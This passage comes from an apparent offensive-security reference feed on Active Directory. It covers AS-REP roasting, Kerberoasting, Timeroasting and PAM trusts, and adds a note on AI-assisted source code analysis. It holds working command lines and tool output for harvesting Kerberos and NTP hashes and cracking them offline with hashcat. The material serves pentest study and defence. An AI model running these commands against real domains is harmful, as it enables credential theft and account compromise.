&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Action&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;AS-REP&lt;/span&gt; &lt;span class="n"&gt;roasting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Target&lt;/span&gt; &lt;span class="n"&gt;User&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TestOU3user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Target&lt;/span&gt; &lt;span class="n"&gt;Domain&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;testlab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;SamAccountName&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TestOU3user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;DistinguishedName&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;CN&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;TestOU3user&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;OU&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;TestOU3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;OU&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;TestOU2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;OU&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;TestOU1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;DC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;testlab&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;DC&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;local&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Using&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt; &lt;span class="n"&gt;controller&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;testlab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;192.168&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;52&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;100&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Building&lt;/span&gt; &lt;span class="nb"&gt;AS-REQ&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;w&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;o&lt;/span&gt; &lt;span class="n"&gt;preauth&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;testlab.local\TestOU3user&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Connecting&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="mf"&gt;192.168&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;52&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;100&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="mf"&gt;88&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Sent&lt;/span&gt; &lt;span class="mf"&gt;169&lt;/span&gt; &lt;span class="n"&gt;bytes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Received&lt;/span&gt; &lt;span class="mf"&gt;1437&lt;/span&gt; &lt;span class="n"&gt;bytes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[+]&lt;/span&gt; &lt;span class="nb"&gt;AS-REQ&lt;/span&gt; &lt;span class="n"&gt;w&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;o&lt;/span&gt; &lt;span class="n"&gt;preauth&lt;/span&gt; &lt;span class="n"&gt;successful&lt;/span&gt;&lt;span class="p"&gt;!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="nb"&gt;AS-REP&lt;/span&gt; &lt;span class="n"&gt;hash&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$krb5asrep$TestOU3user@testlab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;858B6F645D9F9B57210292E5711E0&lt;/span&gt;&lt;span class="p"&gt;...(&lt;/span&gt;&lt;span class="n"&gt;snip&lt;/span&gt;&lt;span class="p"&gt;)...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py"&gt;GetNPUsers&lt;/a&gt; from Impacket Suite&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;GetNPUsers&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;htb&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;svc-alfresco&lt;/span&gt; &lt;span class="n"&gt;-no-pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[*]&lt;/span&gt; &lt;span class="n"&gt;Getting&lt;/span&gt; &lt;span class="n"&gt;TGT&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nb"&gt;svc-alfresco&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$krb5asrep$23$svc&lt;/span&gt;&lt;span class="n"&gt;-alfresco&lt;/span&gt;&lt;span class="nv"&gt;@HTB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;LOCAL&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;c13528009a59be0a634bb9b8e84c88ee&lt;/span&gt;&lt;span class="nv"&gt;$cb8e87d02bd0ac7a&lt;/span&gt;&lt;span class="p"&gt;[...]&lt;/span&gt;&lt;span class="n"&gt;e776b4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# extract hashes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="nv"&gt;@kali&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="nb"&gt;impacket-examples&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;GetNPUsers&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;jurassic&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;park&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt; &lt;span class="n"&gt;-usersfile&lt;/span&gt; &lt;span class="n"&gt;usernames&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt; &lt;span class="n"&gt;-format&lt;/span&gt; &lt;span class="n"&gt;hashcat&lt;/span&gt; &lt;span class="n"&gt;-outputfile&lt;/span&gt; &lt;span class="n"&gt;hashes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;asreproast&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt;&lt;span class="nv"&gt;@kali&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="nb"&gt;impacket-examples&lt;/span&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="n"&gt;python&lt;/span&gt; &lt;span class="n"&gt;GetNPUsers&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;jurassic&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;park&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;triceratops&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Sh4rpH0rns&lt;/span&gt; &lt;span class="n"&gt;-request&lt;/span&gt; &lt;span class="n"&gt;-format&lt;/span&gt; &lt;span class="n"&gt;hashcat&lt;/span&gt; &lt;span class="n"&gt;-outputfile&lt;/span&gt; &lt;span class="n"&gt;hashes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;asreproast&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;netexec Module&lt;/p&gt;</description></item><item><title>Roasting - Kerberoasting</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-roasting-kerberoasting/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-roasting-kerberoasting/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&amp;ldquo;A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. &amp;quot; - &lt;a href="https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names"&gt;MSDN&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.&lt;/p&gt;</description></item><item><title>Roasting - Timeroasting</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-roasting-timeroasting/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-roasting-timeroasting/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Timeroasting takes advantage of Windows&amp;rsquo; NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer account by sending an NTP request with that account&amp;rsquo;s RID&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/SecuraBV/Timeroast"&gt;SecuraBV/Timeroast&lt;/a&gt; - Timeroasting scripts by Tom Tervoort&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;timeroast&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="mf"&gt;10.0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;42&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;tee ntp-hashes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;hashcat&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="mf"&gt;31300&lt;/span&gt; &lt;span class="nb"&gt;ntp-hashes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://snovvcrash.rocks/2024/12/08/applicability-of-the-timeroasting-attack.html"&gt;On the Applicability of the Timeroasting Attack - snovvcrash - December 8, 2024&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf"&gt;TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory"&gt;Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Source Code Analysis</title><link>https://bokkapig.pages.dev/refs/internal/methodology/source-code-analysis/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/methodology/source-code-analysis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Source code analysis is the process of examining and reviewing the code of a software program to identify errors, vulnerabilities, and potential improvements. This can be performed manually by developers or through automated tools that scan the code for issues like security risks, coding standard violations, and performance inefficiencies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="ai-analysis" class="anchored-heading"&gt;AI Analysis&lt;a class="heading-anchor" href="#ai-analysis" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/trailofbits/skills"&gt;trailofbits/skills&lt;/a&gt; - Trail of Bits Claude Code skills for security research, vulnerability detection, and audit workflows.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;npm&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;-g&lt;/span&gt; &lt;span class="nv"&gt;@github&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;copilot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;copilot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;login&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;marketplace&lt;/span&gt; &lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="n"&gt;trailofbits&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;skills&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;marketplace&lt;/span&gt; &lt;span class="n"&gt;browse&lt;/span&gt; &lt;span class="n"&gt;trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;ask-questions&lt;/span&gt;&lt;span class="n"&gt;-if-underspecified&lt;/span&gt;&lt;span class="nv"&gt;@trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;static-analysis&lt;/span&gt;&lt;span class="nv"&gt;@trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;entry-point&lt;/span&gt;&lt;span class="n"&gt;-analyzer&lt;/span&gt;&lt;span class="nv"&gt;@trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;semgrep-rule&lt;/span&gt;&lt;span class="n"&gt;-creator&lt;/span&gt;&lt;span class="nv"&gt;@trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;semgrep-rule&lt;/span&gt;&lt;span class="n"&gt;-variant-creator&lt;/span&gt;&lt;span class="nv"&gt;@trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;sharp-edges&lt;/span&gt;&lt;span class="nv"&gt;@trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;plugin&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;insecure-defaults&lt;/span&gt;&lt;span class="nv"&gt;@trailofbits&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="semgrep" class="anchored-heading"&gt;Semgrep&lt;a class="heading-anchor" href="#semgrep" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Lightweight static analysis for many languages. Find bug variants with patterns that look like source code.&lt;/p&gt;</description></item><item><title>Trust - Privileged Access Management</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/trust-pam/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/trust-pam/</guid><description>&lt;blockquote&gt;
&lt;p&gt;PAM (Privileged Access Management) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Windows Server 2016 or earlier&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If we compromise the bastion we get &lt;code&gt;Domain Admins&lt;/code&gt; privileges on the other domain&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Default configuration for PAM Trust&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# execute on our forest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netdom&lt;/span&gt; &lt;span class="n"&gt;trust&lt;/span&gt; &lt;span class="n"&gt;lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;bastion&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ForestTransitive&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Yes&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netdom&lt;/span&gt; &lt;span class="n"&gt;trust&lt;/span&gt; &lt;span class="n"&gt;lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;bastion&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;EnableSIDHistory&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Yes&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netdom&lt;/span&gt; &lt;span class="n"&gt;trust&lt;/span&gt; &lt;span class="n"&gt;lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;bastion&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;EnablePIMTrust&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Yes&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netdom&lt;/span&gt; &lt;span class="n"&gt;trust&lt;/span&gt; &lt;span class="n"&gt;lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;bastion&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;Quarantine&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;No&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# execute on our bastion&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netdom&lt;/span&gt; &lt;span class="n"&gt;trust&lt;/span&gt; &lt;span class="n"&gt;bastion&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;lab&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ForestTransitive&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Yes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Enumerate PAM trusts&lt;/p&gt;</description></item><item><title>Trust - Relationship</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/trust-relationship/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/trust-relationship/</guid><description>&lt;ul&gt;
&lt;li&gt;One-way
&lt;ul&gt;
&lt;li&gt;Domain B trusts A&lt;/li&gt;
&lt;li&gt;Users in Domain A can access resources in Domain B&lt;/li&gt;
&lt;li&gt;Users in Domain B cannot access resources in Domain A&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Two-way
&lt;ul&gt;
&lt;li&gt;Domain A trusts Domain B&lt;/li&gt;
&lt;li&gt;Domain B trusts Domain A&lt;/li&gt;
&lt;li&gt;Authentication requests can be passed between the two domains in both directions&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="enumerate-trusts-between-domains" class="anchored-heading"&gt;Enumerate trusts between domains&lt;a class="heading-anchor" href="#enumerate-trusts-between-domains" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Native &lt;code&gt;nltest&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nltest&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;trusted_domains&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;PowerShell &lt;code&gt;GetAllTrustRelationships&lt;/code&gt;&lt;/p&gt;
